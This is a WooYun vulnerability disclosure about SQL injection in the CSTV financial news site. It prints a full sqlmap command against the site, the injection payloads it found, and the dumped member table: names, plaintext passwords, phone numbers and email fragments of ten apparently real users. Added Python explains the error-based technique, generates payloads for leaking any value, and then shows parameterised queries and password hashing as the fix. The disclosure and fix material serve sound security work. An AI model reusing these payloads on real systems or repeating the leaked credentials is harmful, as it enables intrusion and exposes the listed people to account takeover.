
Vulnerability summary

Defect ID: wooyun-2015-0157405

Title: SQL injection in CSTV中華財經台 (real names, phone numbers, plaintext passwords and e-mail addresses of a large number of users exposed) (Taiwan)

Vendor: CSTV中華財經台

Author: 路人甲

Submitted: 2015-12-01 19:36

Fix time: 2016-01-16 16:00

Public disclosure: 2016-01-16 16:00

Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: handed to a third-party partner organization (Hitcon, Taiwan internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-12-01: Details sent to the vendor, awaiting vendor response
2015-12-02: Vendor confirmed; details disclosed to the vendor only
2015-12-12: Details disclosed to core white hats and relevant domain experts
2015-12-22: Details disclosed to regular white hats
2016-01-01: Details disclosed to intern white hats
2016-01-16: Details disclosed to the public

Brief description:

The global economy changes by the minute. The arrival of the internet era has completely transformed information delivery and the media landscape; to stand out in 21st-century international competition and build a corporate edge, you need first-hand, real-time financial intelligence.

Detailed description:

URL: http://**.**.**.**/newsContent.aspx?serial=6760

$ python sqlmap.py -u "http://**.**.**.**/newsContent.aspx?serial=6760" -p serial --technique=BEQ --random-agent --batch -D w02040 -T dbo.Members -C name,password,phone,id,email --dump --start 1 --stop 10


Database: w02040
+-------------+---------+
| Table | Entries |
+-------------+---------+
| dbo.Members | 4853 |
+-------------+---------+


Database: w02040
Table: Members
[10 entries]
+---------------------+------------+-----------------+------------+--------------------------------------------------------------+
| name | password | phone | id | email |
+---------------------+------------+-----------------+------------+--------------------------------------------------------------+
| 陳 an an | an420912 | 04-26229874 | an745123 | chen3268@**.**.**.** |
| 黃智洋 | cy79113 | | cy79113 | cyhuang6531808@**.**.**.** |
| 周強生 | 62768278 | 02-22858862 | man | per@**.**.**.** |
| 林鴻銘 | t344328a | 0918155211 | takuya168 | takuya1688@**.**.**.** |
| 李傑 | !1qaz2ws | | !1qaz2ws | neil.tpe@**.**.**.** |
| 陳芳美 | h888988 | 23576588 | ?。88988 | feng2088988 |
| ?成仕 | 660124sc | | ??菜?148 | sunchengshi@**.**.**.** |
| ?成仕 | 660124sc | | ??菜?888 | sunchengshi@**.**.**.** |
| 孫美英 | C5ICKVE4 | 02(22229108 | ?a45782 | a45782@kimo。com |
| 廖明玉 | Azyx2355 | 0933258486 | @093325848 | |
+---------------------+------------+-----------------+------------+--------------------------------------------------------------+

Proof of vulnerability:

current user:    'w02040'
current user is DBA: False
database management system users [6]:
[*] BUILTIN\Administrators
[*] CSTV\Administrator
[*] sa
[*] TB
[*] TB_w
[*] w02040
Database: tempdb
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| dbo.syssegments | 3 |
+-------------------------------+---------+
Database: master
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| dbo.spt_values | 730 |
| dbo.spt_datatype_info | 36 |
| dbo.spt_server_info | 29 |
| dbo.spt_provider_types | 25 |
| dbo.spt_datatype_info_ext | 10 |
| dbo.spt_monitor | 1 |
+-------------------------------+---------+
Database: w02040
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| dbo.Video_hit_tbl | 48672 |
| dbo.tbl_影音主檔 | 46425 |
| dbo.Vw_影音 | 11963 |
| dbo.teacherNewsActi | 4866 |
| dbo.Members | 4853 |
| dbo.teacherReportFax | 4511 |
| dbo.reportFaxContent_vw | 4508 |
| dbo.NewsActiContent_vw | 3283 |
| dbo.EventBillboard_tbl | 922 |
| dbo.InvestCompany_Member_tbl | 693 |
| dbo.AnalyzerChannel_tbl | 552 |
| dbo.LVMH_order | 368 |
| dbo.LVMH_OrderDetail | 368 |
| dbo.Analyzer_tbl | 256 |
| dbo.Analyzer_Company_vw | 252 |
| dbo.Analyzer_vw | 252 |
| dbo.AnalyzerDVD_tbl | 127 |
| dbo.AnalyzerVoice_tbl | 127 |
| dbo.admin_UserPerm_tbl | 126 |
| dbo.LVMH_Sales | 115 |
| dbo.AnalyzerProgram_tbl | 109 |
| dbo.InvestCompany_tbl | 95 |
| dbo.sysconstraints | 79 |
| dbo.LVMH_ID | 65 |
| dbo.AnalyzerChannel_vw | 59 |
| dbo.vw_MoneyTV_排行榜 | 48 |
| dbo.Vw_排行榜 | 46 |
| dbo.TB_SentBooks_tbl | 40 |
| dbo.Forum | 35 |
| dbo.TB_Members_Duty_vw | 29 |
| dbo.admin_user_tbl | 28 |
| dbo.forumTalk | 28 |
| dbo.view_最近影音 | 27 |
| dbo.TB_Duty_Detail_tbl | 25 |
| dbo.Vw_重大要聞 | 22 |
| dbo.admin_permission_tbl | 21 |
| dbo.NewsActiKind | 18 |
| dbo.AD_tbl | 15 |
| dbo.TB_Members_tbl | 14 |
| dbo.Analyzer_Voice_vw | 13 |
| dbo.TB_Member_Unit_vw | 13 |
| dbo.Analyzer_Company_Count_vw | 12 |
| dbo.TB_Duty_tbl | 11 |
| dbo.ADType_tbl | 8 |
| dbo.shop | 8 |
| dbo.TB_Backend_Functions_tbl | 7 |
| dbo.ReportFaxKind | 6 |
| dbo.TB_Donation_Type_tbl | 6 |
| dbo.TB_Lib_Detail_tbl | 6 |
| dbo.TB_Member_Borrow_vw | 6 |
| dbo.FuturesWebSite_tbl | 3 |
| dbo.Info_tbl | 3 |
| dbo.syssegments | 3 |
| dbo.TB_Donate_tbl | 3 |
| dbo.TB_Members_Donate_vw | 3 |
| dbo.billboard_vw | 1 |
| dbo.EventBillboard_vw | 1 |
| dbo.Magazine_tbl | 1 |
| dbo.OnLineStream_tbl | 1 |
| dbo.OnLineStream_vw | 1 |
| dbo.PageView_tbl | 1 |
| dbo.TB_Bible_tbl | 1 |
| dbo.TB_Donate_Detail_tbl | 1 |
| dbo.TB_Lib_tbl | 1 |
| dbo.TB_Msg_tbl | 1 |
| dbo.Vw_影音最近日 | 1 |
+-------------------------------+---------+
Database: msdb
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| dbo.sysconstraints | 99 |
| dbo.syscategories | 19 |
| dbo.backupfile | 10 |
| dbo.backupmediafamily | 9 |
| dbo.backupmediaset | 9 |
| dbo.backupset | 9 |
| dbo.restorefile | 2 |
| dbo.restorefilegroup | 1 |
| dbo.restorehistory | 1 |
+-------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: serial (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: serial=6760 AND 2345=2345
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: serial=6760 AND 7267=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7267=7267) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113)))
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: serial=(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9243=9243) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
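The error-based and inline-query payloads above both rely on the same trick, which the sqlmap output does not spell out: the marker strings are spelled with CHAR() so the payload contains no quote characters, and CONVERT(INT, '<marker><value><marker>') can never succeed, so the DBMS raises a conversion error that quotes the string, value included. The following Python is an added example (not from the original report or from sqlmap) that decodes the markers from the page's own payload and recovers the value from a sample error message. The error text is constructed for illustration; SQL Server 2000 words message 245 slightly differently from later versions, but every version echoes the string that failed to convert. leak_payload is a hypothetical helper that generalizes the CASE-based payload to an arbitrary single-value subquery.

```python
import re

# Error-based payload copied from the sqlmap output above (the page's own data).
ERROR_BASED_PAYLOAD = (
    "6760 AND 7267=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)"
    "+(SELECT (CASE WHEN (7267=7267) THEN CHAR(49) ELSE CHAR(48) END))"
    "+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113)))"
)

# A run of CHAR(n)+CHAR(m)+... with nothing else in between.
CHAR_RUN_RE = re.compile(r"(?:CHAR\(\d+\)\+?)+")
CHAR_RE = re.compile(r"CHAR\((\d+)\)")


def decode_char_run(run):
    """Evaluate a T-SQL CHAR(n)+CHAR(m)+... concatenation to a Python string."""
    return "".join(chr(int(n)) for n in CHAR_RE.findall(run))


def markers(payload):
    """Return the (prefix, suffix) marker strings wrapped around the leaked value.

    The first and last CHAR() runs in the payload are the two markers; the
    CHAR(49)/CHAR(48) in the middle is the one-bit answer ('1' or '0') that the
    CASE expression produces for the boolean test.
    """
    runs = CHAR_RUN_RE.findall(payload)
    return decode_char_run(runs[0]), decode_char_run(runs[-1])


def leak_payload(subquery, prefix="qxzpq", suffix="qqkkq"):
    """Hypothetical generalisation of the page's payload to leak any one string value.

    CONVERT(INT, '<prefix><value><suffix>') always fails, so the conversion error
    carries the value. The subquery must return a single row and column.
    """
    return (
        "6760 AND 1=CONVERT(INT,(SELECT '%s'+CAST((%s) AS VARCHAR(8000))+'%s'))"
        % (prefix, subquery, suffix)
    )


def extract_leaked_value(error_message, prefix, suffix):
    """Pull the value back out of the DBMS error text, the same way sqlmap does."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), error_message, re.S)
    return m.group(1) if m else None


# Constructed error text in the SQL Server 2000 style; not captured from the target.
SAMPLE_ERROR = (
    "Syntax error converting the varchar value 'qxzpq1qqkkq' "
    "to a column of data type int."
)

if __name__ == "__main__":
    pre, suf = markers(ERROR_BASED_PAYLOAD)
    print(pre, suf)                                      # qxzpq qqkkq
    print(extract_leaked_value(SAMPLE_ERROR, pre, suf))  # 1
    print(leak_payload("SELECT TOP 1 id FROM dbo.Members"))
```

The boolean-based blind payload (`serial=6760 AND 2345=2345`) is the slow path: it gets one bit per request from whether the page renders the article, while the error-based form returns a whole value per request, which is why sqlmap's `--technique=BEQ` run finished a 10-row dump quickly.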
Database: w02040
Table: Video_hit_tbl
[5 columns]
+---------------+---------------+
| Column | Type |
+---------------+---------------+
| hit | int |
| lastUpdated | smalldatetime |
| postdate | char |
| source | smallint |
| videoFileName | char |
+---------------+---------------+
Database: w02040
Table: Members
[14 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| addr | char |
| birthday | datetime |
| cellphone | char |
| createDate | datetime |
| email | char |
| id | char |
| name | char |
| password | char |
| phone | char |
| sex | bit |
| vip | char |
| vipBlackListDate | datetime |
| vipPoint | int |
| vipValidDate | datetime |
+------------------+----------+

Remediation:

Put a WAF in front of it. A WAF only filters payload patterns it recognizes; the underlying fix is to stop concatenating the serial parameter into the query (validate it as an integer and pass it as a bound parameter) and to stop storing member passwords in plaintext.
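The following Python is an added example, not code from the report or from the CSTV site, showing the two changes above side by side with the bug class they remove. The application is ASP.NET 1.1 on SQL Server 2000, where the equivalent fix is an ADO.NET SqlParameter; sqlite3 stands in here as an offline database, the news and Members rows are made up (the column names follow the Members schema listed in the report), and the injection behaviour is the same on both engines.

```python
import hashlib
import hmac
import os
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the w02040 database (sqlite3, not SQL Server)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE news (serial INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE Members (id TEXT, name TEXT, password TEXT, email TEXT);
        INSERT INTO news VALUES (6760, 'sample article');
        INSERT INTO Members VALUES ('user1', 'Sample User', 'plaintext-pw', 'user1@example.invalid');
        """
    )
    return conn


def news_content_vulnerable(conn, serial):
    """The bug class behind newsContent.aspx: the raw ?serial= value is pasted into SQL."""
    sql = "SELECT title FROM news WHERE serial=" + serial
    return [row[0] for row in conn.execute(sql)]


def news_content_hardened(conn, serial):
    """Fix: enforce the parameter's type, then bind it instead of concatenating it."""
    if not serial.isdigit():
        raise ValueError("serial must be a non-negative integer")
    rows = conn.execute("SELECT title FROM news WHERE serial=?", (int(serial),))
    return [row[0] for row in rows]


def hash_password(password, salt=None, iterations=200_000):
    """Store a salted PBKDF2-HMAC-SHA256 hash instead of the plaintext password."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Constant-time check of a candidate password against a stored hash string."""
    _algo, iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    db = make_db()
    # Boolean-blind oracle from the report: a true condition keeps the row, a false one drops it.
    print(news_content_vulnerable(db, "6760 AND 1=1"))   # ['sample article']
    print(news_content_vulnerable(db, "6760 AND 1=2"))   # []
    # The same flaw hands over the Members table, passwords included.
    print(news_content_vulnerable(db, "0 UNION SELECT password FROM Members"))
    # The hardened handler refuses anything that is not an integer.
    try:
        news_content_hardened(db, "6760 AND 1=1")
    except ValueError as exc:
        print("rejected:", exc)
    print(news_content_hardened(db, "6760"))
    stored = hash_password("correct horse")
    print(verify_password("correct horse", stored), verify_password("wrong", stored))
```

Even with the parameter bound, the integer check is worth keeping: it turns a malformed request into a clean 400-style error instead of a database exception, which is what error-based injection feeds on. Hashing alone does not undo this breach; the 4,853 exposed passwords should be treated as compromised and reset.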

Copyright notice: credit the source when reposting, 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmation time: 2015-12-02 15:59

Vendor reply:

Thanks for the report.

Latest status:

None yet.